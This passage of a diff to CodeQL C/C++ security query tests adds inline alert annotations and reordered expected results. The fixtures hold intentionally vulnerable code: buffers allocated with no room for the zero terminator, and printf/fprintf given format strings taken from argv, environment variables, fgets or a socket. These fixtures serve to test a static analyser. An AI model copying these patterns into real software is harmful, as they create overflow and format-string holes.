*str) { static void bad5(char *str) { // BAD -- zero-termination proved by strcat (as destination) - char *buffer = (char *)malloc(strlen(str)); + char *buffer = (char *)malloc(strlen(str)); // $ Alert buffer[0] = 0; strcat(buffer, str); free(buffer); @@ -68,7 +68,7 @@ static void bad5(char *str) { static void bad6(char *str, char *dest) { // BAD -- zero-termination proved by strcat (as source) - char *buffer = (char *)malloc(strlen(str)); + char *buffer = (char *)malloc(strlen(str)); // $ Alert decode(buffer, str); strcat(dest, buffer); free(buffer); 
@@ -76,7 +76,7 @@ static void bad6(char *str, char *dest) { static void bad7(char *str, char *str2) { // BAD -- zero-termination proved by strcmp - char *buffer = (char *)malloc(strlen(str)); + char *buffer = (char *)malloc(strlen(str)); // $ Alert decode(buffer, str); if (strcmp(buffer, str2) == 0) { // ... @@ -86,7 +86,7 @@ static void bad7(char *str, char *str2) { static void bad8(wchar_t *str) { // BAD -- zero-termination proved by wcslen - wchar_t *wbuffer = (wchar_t *)malloc(wcslen(str)); + wchar_t *wbuffer = (wchar_t *)malloc(wcslen(str)); // $ Alert wdecode(wbuffer, str); if (wcslen(wbuffer) == 0) { // ... @@ -103,7 +103,7 @@ static void good2(char *str, char *dest) { static void bad9(wchar_t *wstr) { // BAD -- using new - wchar_t *wbuffer = new wchar_t[wcslen(wstr)]; + wchar_t *wbuffer = new wchar_t[wcslen(wstr)]; // $ Alert wcscpy(wbuffer, wstr); delete wbuffer; } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test2.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test2.cpp index 7c7f74066976..1aca38a8f64a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test2.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test2.cpp @@ -61,14 +61,14 @@ static void bad2(wchar_t *str) { static void bad3(wchar_t *str) { // BAD -- Not allocating space for '\0' terminator - wchar_t *buffer = (wchar_t *)calloc(sizeof(wchar_t), wcslen(str)); + wchar_t *buffer = (wchar_t *)calloc(sizeof(wchar_t), wcslen(str)); // $ Alert wcscpy(buffer, str); free(buffer); } static void bad4(char *str) { // BAD -- Not allocating space for '\0' terminator - char *buffer = (char *)realloc(0, strlen(str)); + char *buffer = (char *)realloc(0, strlen(str)); // $ Alert strcpy(buffer, str); free(buffer); } 
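Review bot: In `bad9` the buffer allocated with `new wchar_t[wcslen(wstr)]` is released with `delete wbuffer;`, which is undefined behaviour for an array allocation and unrelated to the missing-terminator case this fixture exists to exercise. Since the function is being annotated here anyway, changing that line to `delete[] wbuffer;` would keep the example limited to the one defect the new `// $ Alert` expects. `bad9` is fully visible in the hunk.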
@@ -81,12 +81,12 @@ void *MyMalloc2(size_t size); void customAllocatorTests(char *str) { { - char *buffer1 = (char *)MyMalloc1(strlen(str)); // BAD (no room for `\0` terminator) + char *buffer1 = (char *)MyMalloc1(strlen(str)); // BAD (no room for `\0` terminator) // $ Alert strcpy(buffer1, str); } { - char *buffer2 = (char *)MyMalloc2(strlen(str)); // BAD (no room for `\0` terminator) + char *buffer2 = (char *)MyMalloc2(strlen(str)); // BAD (no room for `\0` terminator) // $ Alert strcpy(buffer2, str); } } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.expected index 560ecc8bd775..79b6ff33410e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.expected 
@@ -1,3 +1,7 @@ +#select +| char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | The value of this argument may come from $@ and is being used as a formatting argument to badVaSink(data), which calls vsnprintf(format). | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | buffer read by recv | +| char_console_fprintf_01_bad.c:49:21:49:24 | *data | char_console_fprintf_01_bad.c:30:23:30:35 | fgets output argument | char_console_fprintf_01_bad.c:49:21:49:24 | *data | The value of this argument may come from $@ and is being used as a formatting argument to fprintf(format). | char_console_fprintf_01_bad.c:30:23:30:35 | fgets output argument | string read by fgets | +| char_environment_fprintf_01_bad.c:36:21:36:24 | *data | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | char_environment_fprintf_01_bad.c:36:21:36:24 | *data | The value of this argument may come from $@ and is being used as a formatting argument to fprintf(format). | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | an environment variable | edges | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | char_connect_socket_w32_vsnprintf_01_bad.c:100:13:100:60 | ... = ... | provenance | | | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | provenance | | 
@@ -21,7 +25,3 @@ nodes | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | semmle.label | *call to getenv | | char_environment_fprintf_01_bad.c:36:21:36:24 | *data | semmle.label | *data | subpaths -#select -| char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | The value of this argument may come from $@ and is being used as a formatting argument to badVaSink(data), which calls vsnprintf(format). | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | buffer read by recv | -| char_console_fprintf_01_bad.c:49:21:49:24 | *data | char_console_fprintf_01_bad.c:30:23:30:35 | fgets output argument | char_console_fprintf_01_bad.c:49:21:49:24 | *data | The value of this argument may come from $@ and is being used as a formatting argument to fprintf(format). | char_console_fprintf_01_bad.c:30:23:30:35 | fgets output argument | string read by fgets | -| char_environment_fprintf_01_bad.c:36:21:36:24 | *data | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | char_environment_fprintf_01_bad.c:36:21:36:24 | *data | The value of this argument may come from $@ and is being used as a formatting argument to fprintf(format). | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | an environment variable | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.qlref index 079e0c8a7c0e..9c363bfac55e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.qlref 
@@ -1 +1,2 @@ -Security/CWE/CWE-134/UncontrolledFormatString.ql \ No newline at end of file +query: Security/CWE/CWE-134/UncontrolledFormatString.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_connect_socket_w32_vsnprintf_01_bad.c b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_connect_socket_w32_vsnprintf_01_bad.c index ccba3e548403..9c177049c0fd 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_connect_socket_w32_vsnprintf_01_bad.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_connect_socket_w32_vsnprintf_01_bad.c @@ -91,7 +91,7 @@ void CWE134_Uncontrolled_Format_String__char_connect_socket_w32_vsnprintf_01_bad /* Abort on error or the connection was closed, make sure to recv one * less char than is in the recv_buf in order to append a terminator */ /* Abort on error or the connection was closed */ - recvResult = recv(connectSocket, (char *)(data + dataLen), sizeof(char) * (100 - dataLen - 1), 0); + recvResult = recv(connectSocket, (char *)(data + dataLen), sizeof(char) * (100 - dataLen - 1), 0); // $ Source if (recvResult == SOCKET_ERROR || recvResult == 0) { break; @@ -122,5 +122,5 @@ void CWE134_Uncontrolled_Format_String__char_connect_socket_w32_vsnprintf_01_bad } #endif } - badVaSink(data, data); + badVaSink(data, data); // $ Alert } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_console_fprintf_01_bad.c b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_console_fprintf_01_bad.c index 1af281b9f422..493f9a5f7de5 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_console_fprintf_01_bad.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_console_fprintf_01_bad.c 
@@ -27,7 +27,7 @@ void CWE134_Uncontrolled_Format_String__char_console_fprintf_01_bad() /* POTENTIAL FLAW: Read data from the console */ if(100-data_len > 1) { - if (fgets(data+data_len, (int)(100-data_len), stdin) != NULL) + if (fgets(data+data_len, (int)(100-data_len), stdin) != NULL) // $ Source { /* The next 3 lines remove the carriage return from the string that is * inserted by fgets() */ @@ -46,7 +46,7 @@ void CWE134_Uncontrolled_Format_String__char_console_fprintf_01_bad() } } /* POTENTIAL FLAW: Do not specify the format allowing a possible format string vulnerability */ - fprintf(stdout, data); + fprintf(stdout, data); // $ Alert } /* goodG2B uses the GoodSource with the BadSink */ diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_environment_fprintf_01_bad.c b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_environment_fprintf_01_bad.c index f759a9d8e61e..bc9f7e9f4a86 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_environment_fprintf_01_bad.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_environment_fprintf_01_bad.c @@ -24,7 +24,7 @@ void CWE134_Uncontrolled_Format_String__char_environment_fprintf_01_bad() { /* Append input from an environment variable to data */ size_t data_len = strlen(data); - char * environment = GETENV(ENV_VARIABLE); + char * environment = GETENV(ENV_VARIABLE); // $ Source /* If there is data in the environment variable */ if (environment != NULL) { @@ -33,7 +33,7 @@ void CWE134_Uncontrolled_Format_String__char_environment_fprintf_01_bad() } } /* POTENTIAL FLAW: Do not specify the format allowing a possible format string vulnerability */ - fprintf(stdout, data); + fprintf(stdout, data); // $ Alert } /* goodG2B uses the GoodSource with the BadSink */ diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.c b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.c index 5649c0e19b1c..4c6baf0d562e 100644 
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.c @@ -10,7 +10,7 @@ void printWrapper(char *correct) { printf(correct); } -int main(int argc, char **argv) { +int main(int argc, char **argv) { // $ Source // GOOD: constant format printf("Correct"); printWrapper("Correct"); 
@@ -92,63 +92,63 @@ int main(int argc, char **argv) { printWrapper((char *) c10); // BAD: format comes from argv - printf(argv[1]); - printWrapper(argv[1]); + printf(argv[1]); // $ Alert + printWrapper(argv[1]); // $ Alert // BAD: i1 value comes from argv char *i1; i1 = argv[1]; - printf(i1); - printWrapper(i1); + printf(i1); // $ Alert + printWrapper(i1); // $ Alert // BAD: i2 value comes from argv char **i2 = argv; - printf(i2[0]); - printWrapper(i2[0]); + printf(i2[0]); // $ Alert + printWrapper(i2[0]); // $ Alert // BAD: i2 value comes from argv - printf(*i2); - printWrapper(*i2); + printf(*i2); // $ Alert + printWrapper(*i2); // $ Alert // BAD: i3 value comes from argv char i3[5012]; memcpy(i3, argv[1], 5012); - printf(i3); - printWrapper(i3); + printf(i3); // $ Alert + printWrapper(i3); // $ Alert // BAD: i4 value comes from argv char *i4 = i3; - printf(i4); - printWrapper(i4); + printf(i4); // $ Alert + printWrapper(i4); // $ Alert // BAD: i5 value comes from argv char i5[5012]; i5[0] = argv[1][0]; - printf(i5); - printWrapper(i5); + printf(i5); // $ Alert + printWrapper(i5); // $ Alert // BAD: i5 value comes from argv - printf(i5 + 1); - printWrapper(i5 + 1); + printf(i5 + 1); // $ Alert + printWrapper(i5 + 1); // $ Alert // BAD: i4 value comes from argv - printf(i4++); - printWrapper(--i4); + printf(i4++); // $ Alert + printWrapper(--i4); // $ Alert // BAD: i5 value comes from argv, so in some cases the format come from argv - printf(argv[1] ? "a" : i5); - printWrapper(argv[1] ? "a" : i5); + printf(argv[1] ? "a" : i5); // $ Alert + printWrapper(argv[1] ? 
"a" : i5); // $ Alert // BAD: i7 receives the value of i1, which comes from argv char *i7 = (argv[1] , i1); - printf(i7); - printWrapper(i7); + printf(i7); // $ Alert + printWrapper(i7); // $ Alert // BAD: i8 value comes from argv char *i8; *(&i8) = argv[1]; - printf(i8); - printWrapper(i8); + printf(i8); // $ Alert + printWrapper(i8); // $ Alert // BAD: i9 value comes from argv [NOT DETECTED] char i9buf[32]; diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.expected index 7b87c3ff440a..ca7aa17cf086 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.expected 
@@ -1,3 +1,28 @@ +#select +| argvLocal.c:95:9:95:15 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:95:9:95:15 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:96:15:96:21 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:96:15:96:21 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:101:9:101:10 | *i1 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:101:9:101:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:102:15:102:16 | *i1 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:102:15:102:16 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:106:9:106:13 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:106:9:106:13 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:107:15:107:19 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:107:15:107:19 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:110:9:110:11 | ** ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:110:9:110:11 | ** ... 
| The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:111:15:111:17 | ** ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:111:15:111:17 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:116:9:116:10 | *i3 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:116:9:116:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:117:15:117:16 | *i3 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:117:15:117:16 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:121:9:121:10 | *i4 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:121:9:121:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:122:15:122:16 | *i4 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:122:15:122:16 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:127:9:127:10 | *i5 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:127:9:127:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). 
| argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:128:15:128:16 | *i5 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:128:15:128:16 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:131:9:131:14 | *... + ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:131:9:131:14 | *... + ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:132:15:132:20 | *... + ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:132:15:132:20 | *... + ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:135:9:135:12 | *... ++ | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:135:9:135:12 | *... ++ | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:136:15:136:18 | *-- ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:136:15:136:18 | *-- ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:139:9:139:26 | *... ? ... : ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:139:9:139:26 | *... ? ... : ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:140:15:140:32 | *... ? ... : ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:140:15:140:32 | *... 
? ... : ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:144:9:144:10 | *i7 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:144:9:144:10 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:145:15:145:16 | *i7 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:145:15:145:16 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:150:9:150:10 | *i8 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:150:9:150:10 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:151:15:151:16 | *i8 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:151:15:151:16 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | edges | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:9:25:9:31 | *correct | provenance | | | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:95:9:95:15 | *access to array | provenance | | 
@@ -132,28 +157,3 @@ subpaths | argvLocal.c:122:15:122:16 | *i4 | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:122:15:122:16 | printWrapper output argument | | argvLocal.c:128:15:128:16 | *i5 | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:128:15:128:16 | printWrapper output argument | | argvLocal.c:132:15:132:20 | *... + ... | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:132:15:132:20 | printWrapper output argument | -#select -| argvLocal.c:95:9:95:15 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:95:9:95:15 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:96:15:96:21 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:96:15:96:21 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:101:9:101:10 | *i1 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:101:9:101:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:102:15:102:16 | *i1 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:102:15:102:16 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:106:9:106:13 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:106:9:106:13 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). 
| argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:107:15:107:19 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:107:15:107:19 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:110:9:110:11 | ** ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:110:9:110:11 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:111:15:111:17 | ** ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:111:15:111:17 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:116:9:116:10 | *i3 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:116:9:116:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:117:15:117:16 | *i3 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:117:15:117:16 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:121:9:121:10 | *i4 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:121:9:121:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). 
| argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:122:15:122:16 | *i4 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:122:15:122:16 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:127:9:127:10 | *i5 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:127:9:127:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:128:15:128:16 | *i5 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:128:15:128:16 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:131:9:131:14 | *... + ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:131:9:131:14 | *... + ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:132:15:132:20 | *... + ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:132:15:132:20 | *... + ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:135:9:135:12 | *... ++ | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:135:9:135:12 | *... ++ | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:136:15:136:18 | *-- ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:136:15:136:18 | *-- ... 
| The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:139:9:139:26 | *... ? ... : ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:139:9:139:26 | *... ? ... : ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:140:15:140:32 | *... ? ... : ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:140:15:140:32 | *... ? ... : ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:144:9:144:10 | *i7 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:144:9:144:10 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:145:15:145:16 | *i7 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:145:15:145:16 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:150:9:150:10 | *i8 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:150:9:150:10 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:151:15:151:16 | *i8 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:151:15:151:16 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). 
| argvLocal.c:13:27:13:30 | **argv | a command-line argument |
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.qlref
index 079e0c8a7c0e..9c363bfac55e 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.qlref
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.qlref
@@ -1 +1,2 @@
-Security/CWE/CWE-134/UncontrolledFormatString.ql
\ No newline at end of file
+query: Security/CWE/CWE-134/UncontrolledFormatString.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.expected
index b5f6ad602fb8..e853d5457f65 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.expected
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.expected
@@ -1,3 +1,27 @@ +#select +| consts.cpp:86:9:86:10 | *v1 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:86:9:86:10 | *v1 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:86:2:86:7 | call to printf | printf | +| consts.cpp:91:9:91:10 | *v2 | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:91:9:91:10 | *v2 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:91:2:91:7 | call to printf | printf | +| consts.cpp:95:9:95:10 | *v3 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:95:9:95:10 | *v3 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:95:2:95:7 | call to printf | printf | +| consts.cpp:95:9:95:10 | *v3 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:95:9:95:10 | *v3 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:95:2:95:7 | call to printf | printf | +| consts.cpp:100:9:100:10 | *v4 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:100:9:100:10 | *v4 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:100:2:100:7 | call to printf | printf | +| consts.cpp:100:9:100:10 | *v4 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:100:9:100:10 | *v4 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:100:2:100:7 | call to printf | printf | +| consts.cpp:103:9:103:17 | *call to varFunc | consts.cpp:103:9:103:17 | *call to varFunc | consts.cpp:103:9:103:17 | *call to varFunc | The format string argument to $@ has a source which cannot be verified to originate from a string literal. 
